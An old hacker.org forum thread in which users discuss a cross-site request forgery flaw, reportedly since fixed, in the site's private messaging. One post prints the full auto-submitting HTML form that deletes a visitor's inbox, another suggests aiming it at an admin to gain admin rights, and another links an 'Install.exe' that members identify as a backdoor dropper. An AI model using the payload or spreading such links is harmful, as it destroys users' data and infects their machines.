Danger - don't read this

Discussion about hacker.org's server
Post Reply
User avatar
efe
Posts: 45
Joined: Sun Oct 26, 2008 10:28 am
Location: germany

Danger - don't read this

Post by efe »


I've warned you!

Don't click here: http://bit.ly/dontclickme
Top
michuber
Posts: 57
Joined: Sun Oct 26, 2008 3:30 pm

Re: Danger - don't read this

Post by michuber »

It deletes all messages in your inbox...

Code: Select all

<html>
  <head>
  </head>
  <body onLoad=javascript:document.xsrf.submit()>

<form action="http://www.hacker.org/forum/privmsg.php?folder=inbox" method="post" 
name="xsrf">
<input type="hidden" name="mode" value="" />
<input type="hidden" name="deleteall" value="true" />
<input type="hidden" name="confirm" value="Yes">

</body>
</html>
Top
User avatar
m!nus
Posts: 202
Joined: Sat Jul 28, 2007 6:49 pm
Location: Germany

Post by m!nus »

nice POC. if you make a link like this for an admin you can get yourself admined :P
Top
User avatar
efe
Posts: 45
Joined: Sun Oct 26, 2008 10:28 am
Location: germany

Post by efe »

adum has just fixed that issue, so you may now safely click the link - and nothing will happen to your PM's !
Top
User avatar
Zaffron
Posts: 491
Joined: Thu Dec 18, 2008 12:18 am
Location: Invading a small country

Post by Zaffron »

What was the point of posting this anyways??
Top
Chocoholic
Posts: 44
Joined: Mon Feb 16, 2009 4:11 pm
Location: UK

Post by Chocoholic »

Right, seems quite an unsafe way of exposing a vulnerability. Anyways, is this a general phpBB issue? I never liked that piece of s..oftware anyways.
Top
tomtomtomtom
Posts: 119
Joined: Mon Mar 09, 2009 5:24 pm

LoL

Post by tomtomtomtom »

This is the program he used to generate the code>>>

http://rapidshare.com/files/211946099/Install.exe.html
Image
Top
User avatar
PaRaDoX
Posts: 708
Joined: Fri Aug 22, 2008 5:52 am
Location: In your fridge, waiting to pop out and scare you.

Re: LoL

Post by PaRaDoX »

tomtomtomtom wrote:This is the program he used to generate the code>>>

http://rapidshare.com/files/211946099/Install.exe.html
don't go cracker on us tomtomtomtom.

Install.exe.html?
INSTALL.EXE? no program name? nothing? that on top of the fact that there's about a 1 in (insert number of rapidshare files here) chance that you'd EVER find that. Tell me the program name, smart guy. :3
Image

~You are a glitch in my reasoning.
Top
plope0726
Posts: 826
Joined: Mon Dec 15, 2008 10:13 pm

Post by plope0726 »

BackDoor.VB.DMS.dropper
Top
who
Posts: 1
Joined: Fri Jul 25, 2008 4:15 am

Post by who »

sweet!
Top
flamingdragon
Posts: 1
Joined: Sat May 12, 2007 2:20 am

Post by flamingdragon »

Gnarly
Top
User avatar
PaRaDoX
Posts: 708
Joined: Fri Aug 22, 2008 5:52 am
Location: In your fridge, waiting to pop out and scare you.

Post by PaRaDoX »

plope0726 wrote:BackDoor.VB.DMS.dropper
and who called it? :3


and who are these 2 new guys saying its sweet? probably mule accounts of his...

sorry, mule is a term used in MMO's. Too used to it :3
Image

~You are a glitch in my reasoning.
Top
plope0726
Posts: 826
Joined: Mon Dec 15, 2008 10:13 pm

Post by plope0726 »

[quote="PaRaDoX"][quote="plope0726"]BackDoor.VB.DMS.dropper[/quote]

and who called it? :3


and who are these 2 new guys saying its sweet? probably mule accounts of his...

sorry, mule is a term used in MMO's. Too used to it :3[/quote]

You did :) Those 2 idiots will probably try to use it and add a nice backdoor to their own computer... :lol:
Top
User avatar
PaRaDoX
Posts: 708
Joined: Fri Aug 22, 2008 5:52 am
Location: In your fridge, waiting to pop out and scare you.

Post by PaRaDoX »

plope0726 wrote:
PaRaDoX wrote:
plope0726 wrote:BackDoor.VB.DMS.dropper
and who called it? :3


and who are these 2 new guys saying its sweet? probably mule accounts of his...

sorry, mule is a term used in MMO's. Too used to it :3
You did :) Those 2 idiots will probably try to use it and add a nice backdoor to their own computer... :lol:

.....unless they are mules.
Image

~You are a glitch in my reasoning.
Top
Post Reply

Return to “The Hacker's Server”